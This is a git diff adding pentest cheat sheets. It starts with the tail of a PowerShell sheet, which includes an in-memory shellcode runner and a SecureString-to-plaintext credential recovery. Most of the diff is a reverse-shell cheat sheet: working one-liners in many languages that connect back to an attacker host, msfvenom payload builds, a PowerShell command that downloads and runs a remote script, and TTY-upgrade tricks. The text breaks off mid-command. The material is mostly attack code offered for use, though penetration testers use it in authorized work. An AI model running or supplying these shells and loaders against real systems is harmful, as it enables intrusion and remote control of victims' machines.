Get-Delegate +{ + Param ( + [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr, # Function address + [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes, # array with the argument types + [Parameter(Position = 2)] [Type] $retType = [Void] # Return type + ) + + $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). + DefineDynamicModule('QM', $false). + DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed') + $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed') + $delegate = $type.CreateType() + + return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate) +} +``` +### Example with a simple shellcode runner + +```powershell +# Create a Delegate function to be able to call the function that we have the address +function Get-Delegate +{ + Param ( + [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr, # Function address + [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes, # array with the argument types + [Parameter(Position = 2)] [Type] $retType = [Void] # Return type + ) + + $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). + DefineDynamicModule('QM', $false). + DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed') + $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed') + $delegate = $type.CreateType() + + return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate) +} +# Allow to retrieve function address from a dll +function LookupFunc { + + Param ($moduleName, $functionName) + + $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') + $tmp=@() + $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} + return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) +} + +# Simple Shellcode runner using delegation +$VirtualAllocAddr = LookupFunc "Kernel32.dll" "VirtualAlloc" +$CreateThreadAddr = LookupFunc "Kernel32.dll" "CreateThread" +$WaitForSingleObjectAddr = LookupFunc "Kernel32.dll" "WaitForSingleObject" + + +$VirtualAlloc = Get-Delegate $VirtualAllocAddr @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]) +$CreateThread = Get-Delegate $CreateThreadAddr @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) +$WaitForSingleObject = Get-Delegate $WaitForSingleObjectAddr @([IntPtr], [Int32]) ([Int]) + +[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0 ... + +$mem = $VirtualAlloc.Invoke([IntPtr]::Zero, $buf.Length, 0x3000, 0x40) +[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $mem, $buf.Length) +$hThread = $CreateThread.Invoke([IntPtr]::Zero, 0, $mem, [IntPtr]::Zero, 0, [IntPtr]::Zero) +$WaitForSingleObject.Invoke($hThread, 0xFFFFFFFF) + +``` + +## Secure String to Plaintext + +```ps1 +$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring +$user = "HTB\Tom" +$cred = New-Object System.management.Automation.PSCredential($user, $pass) +$cred.GetNetworkCredential() | fl +UserName : Tom +Password : 1ts-mag1c!!! +SecurePassword : System.Security.SecureString +Domain : HTB +``` + +## References + +* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) +* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/docs/pentest/Reverse Shell Cheatsheet.md b/docs/pentest/Reverse Shell Cheatsheet.md new file mode 100644 index 0000000..fe02072 --- /dev/null +++ b/docs/pentest/Reverse Shell Cheatsheet.md @@ -0,0 +1,620 @@ +# Reverse Shell Cheat Sheet + +## Summary + +* [Tools](#tools) +* [Reverse Shell](#reverse-shell) + * [Awk](#awk) + * [Automatic Reverse Shell Generator](#revshells) + * [Bash TCP](#bash-tcp) + * [Bash UDP](#bash-udp) + * [C](#c) + * [Dart](#dart) + * [Golang](#golang) + * [Groovy Alternative 1](#groovy-alternative-1) + * [Groovy](#groovy) + * [Java Alternative 1](#java-alternative-1) + * [Java Alternative 2](#java-alternative-2) + * [Java](#java) + * [Lua](#lua) + * [Ncat](#ncat) + * [Netcat OpenBsd](#netcat-openbsd) + * [Netcat BusyBox](#netcat-busybox) + * [Netcat Traditional](#netcat-traditional) + * [NodeJS](#nodejs) + * [OpenSSL](#openssl) + * [Perl](#perl) + * [PHP](#php) + * [Powershell](#powershell) + * [Python](#python) + * [Ruby](#ruby) + * [Rust](#rust) + * [Socat](#socat) + * [Telnet](#telnet) + * [War](#war) +* [Meterpreter Shell](#meterpreter-shell) + * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) + * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) + * [Linux Staged reverse TCP](#linux-staged-reverse-tcp) + * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp) + * [Other platforms](#other-platforms) +* [Spawn TTY Shell](#spawn-tty-shell) +* [References](#references) + +## Tools + +- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) ![image](https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png) +- [revshellgen](https://github.com/t0thkr1s/revshellgen) - CLI Reverse Shell generator + +## Reverse Shell + +### Bash TCP + +```bash +bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 + +0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196 + +/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1 +``` + +### Bash UDP + +```bash +Victim: +sh -i >& /dev/udp/10.0.0.1/4242 0>&1 + +Listener: +nc -u -lvp 4242 +``` + +Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash + +### Socat + +```powershell +user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 +user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +``` +```powershell +user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +``` + +Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) + +### Perl + +```perl +perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + + +NOTE: Windows only +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` + +### Python + +Linux only + +IPv4 +```python +export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +``` +```python +python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' +``` +```python +python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())' +``` + +IPv4 (No Spaces) +```python +python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` +```python +python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' +``` +```python +python -c 'socket=__import__("socket");subprocess=__import__("subprocess");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())' +``` + +IPv4 (No Spaces, Shortened) +```python +python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' +``` +```python +python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])' +``` +```python +python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())' +``` + +IPv4 (No Spaces, Shortened Further) +```python +python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' +``` +```python +python -c 'a=__import__;b=a("socket").socket;p=a("subprocess").call;o=a("os").dup2;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])' +``` +```python +python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())' +``` + +IPv6 +```python +python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` + +IPv6 (No Spaces) +```python +python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` + +IPv6 (No Spaces, Shortened) +```python +python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' +``` + +Windows only (Python2) + +```powershell +python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` + +Windows only (Python3) + +```powershell +python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('10.0.0.1',4242));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()" +``` + +### PHP + +```bash +php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;' +php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' +``` + +```bash +php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' +``` + +### Ruby + +```ruby +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4242).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + +ruby -rsocket -e'exit if fork;c=TCPSocket.new("10.0.0.1","4242");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}' + +NOTE: Windows only +ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4242");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` + +### Rust + +```rust +use std::net::TcpStream; +use std::os::unix::io::{AsRawFd, FromRawFd}; +use std::process::{Command, Stdio}; + +fn main() { + let s = TcpStream::connect("10.0.0.1:4242").unwrap(); + let fd = s.as_raw_fd(); + Command::new("/bin/sh") + .arg("-i") + .stdin(unsafe { Stdio::from_raw_fd(fd) }) + .stdout(unsafe { Stdio::from_raw_fd(fd) }) + .stderr(unsafe { Stdio::from_raw_fd(fd) }) + .spawn() + .unwrap() + .wait() + .unwrap(); +} +``` +### Golang + +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` + +### Netcat Traditional + +```bash +nc -e /bin/sh 10.0.0.1 4242 +nc -e /bin/bash 10.0.0.1 4242 +nc -c bash 10.0.0.1 4242 +``` + +### Netcat OpenBsd + +```bash +rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f +``` + +### Netcat BusyBox + +```bash +rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f +``` + +### Ncat + +```bash +ncat 10.0.0.1 4242 -e /bin/bash +ncat --udp 10.0.0.1 4242 -e /bin/bash +``` + +### OpenSSL + +Attacker: +```powershell +user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes +user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242 +or +user@attack$ ncat --ssl -vv -l -p 4242 + +user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s +``` + +TLS-PSK (does not rely on PKI or self-signed certificates) +```bash +# generate 384-bit PSK +# use the generated string as a value for the two PSK variables from below +openssl rand -hex 48 +# server (attacker) +export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT +# client (victim) +export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE +``` + +### Powershell + +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +```powershell +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" +``` + +```powershell +powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') +``` + +### Awk + +```powershell +awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` + +### Java + +```java +Runtime r = Runtime.getRuntime(); +Process p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do $line 2>&5 >&5; done'"); +p.waitFor(); + +``` + +#### Java Alternative 1 + +```java +String host="127.0.0.1"; +int port=4444; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); + +``` + +#### Java Alternative 2 +**NOTE**: This is more stealthy + +```java +Thread thread = new Thread(){ + public void run(){ + // Reverse shell here + } +} +thread.start(); +``` + +### Telnet +```bash +In Attacker machine start two listeners: +nc -lvp 8080 +nc -lvp 8081 + +In Victime machine run below command: +telnet 8080 | /bin/sh | telnet 8081 +``` + +### War + +```java +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war +strings reverse.war | grep jsp # in order to get the name of the file +``` + + +### Lua + +Linux only + +```powershell +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');" +``` + +Windows and Linux + +```powershell +lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` + +### NodeJS + +```javascript +(function(){ + var net = require("net"), + cp = require("child_process"), + sh = cp.spawn("/bin/sh", []); + var client = new net.Socket(); + client.connect(4242, "10.0.0.1", function(){ + client.pipe(sh.stdin); + sh.stdout.pipe(client); + sh.stderr.pipe(client); + }); + return /a/; // Prevents the Node.js application from crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242') + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash') + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` + +### Groovy + +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) +NOTE: Java reverse shell also work for Groovy + +```java +String host="10.0.0.1"; +int port=4242; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` + +#### Groovy Alternative 1 +**NOTE**: This is more stealthy + +```java +Thread.start { + // Reverse shell here +} +``` + +### C + +Compile with `gcc /tmp/shell.c --output csh && csh` + +```csharp +#include +#include +#include +#include +#include +#include +#include + +int main(void){ + int port = 4242; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + + return 0; +} +``` + +### Dart + +```java +import 'dart:io'; +import 'dart:convert'; + +main() { + Socket.connect("10.0.0.1", 4242).then((socket) { + socket.listen((data) { + Process.start('powershell.exe', []).then((Process process) { + process.stdin.writeln(new String.fromCharCodes(data).trim()); + process.stdout + .transform(utf8.decoder) + .listen((output) { socket.write(output); }); + }); + }, + onDone: () { + socket.destroy(); + }); + }); +} +``` + +## Meterpreter Shell + +### Windows Staged reverse TCP + +```powershell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe +``` + +### Windows Stageless reverse TCP + +```powershell +msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe +``` + +### Linux Staged reverse TCP + +```powershell +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf +``` + +### Linux Stageless reverse TCP + +```powershell +msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf +``` + +### Other platforms + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=4242 -f raw > shell.pl +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` + +## Spawn TTY Shell + +In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`. + +```powershell +rlwrap nc 10.0.0.1 4242 + +rlwrap -r -f . nc 10.0.0.1 4242 +-f . will make rlwrap use the current history file as a completion word list. +-r Put all words seen on in- and output on the completion list. +``` + +Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell. + +:warning: OhMyZSH might break this trick, a simple `sh` is recommended + +> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect + +```powershell +ctrl+z +echo $TERM && tput lines && tput cols + +# for bash +stty raw -echo +fg + +# for zsh +stty raw -echo; fg + +reset +export SHELL=bash +export TERM=xterm-256color +stty rows columns +``` + +or use `socat` binary to get a fully tty reverse shell + +```bash +socat file:`tty`,raw,echo=0 tcp-listen:12345 +``` + +Alternatively, `rustcat` binary can automatically inject the TTY shell command. + +The shell will be automatically upgraded and the TTY size will be provided for manual adjustment. +Not only that, upon exiting the shell, the terminal will be reset and thus usable. + +```bash +stty raw -echo; stty size && rcat l -ie "/usr/bin/script -qc /bin/bash /dev/null" 6969 && reset +``` + + +Spawn a TTY shell from an interpreter + +```powershell +/bin/sh -i +python3 -c 'import pty; pty.spawn("/bin/sh")' +python3 -c "__import__('pty').spawn('/bin/bash')" +python3 -c "__import__('subprocess').call(['/bin/bash'])" +perl -e 'exec "/bin/sh";' +perl: exec "/bin/sh"; +perl -e 'print `/bin/bash`' +ruby: exec "/bin/sh" +lua: os.execute('/bin/sh') +``` + +- vi: `:!bash` +- vi: `:set shell=/bin/bash:shell` +- nmap: `!sh` +- mysql: `! bash` + +Alternative TTY method + +``` +www-data@debian:/dev/shm$ su - user +su: must be run from a terminal + +www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null +www-data@debian:/dev/shm$ su - user +Password: P4ssW0rD + +user@debian:~$ +``` + +## Fully interactive reverse shell on Windows +The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. + +**ConPtyShell uses the function [CreatePseudoConsole()](https://docs.microsoft.com/en-us/windows/console/createpseudoconsole). This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).** + + +Server Side: + +``` +stty raw -echo; (stty size; cat) | nc -lvnp 3001 +``` + +Client Side: + +``` +IEX(IWR 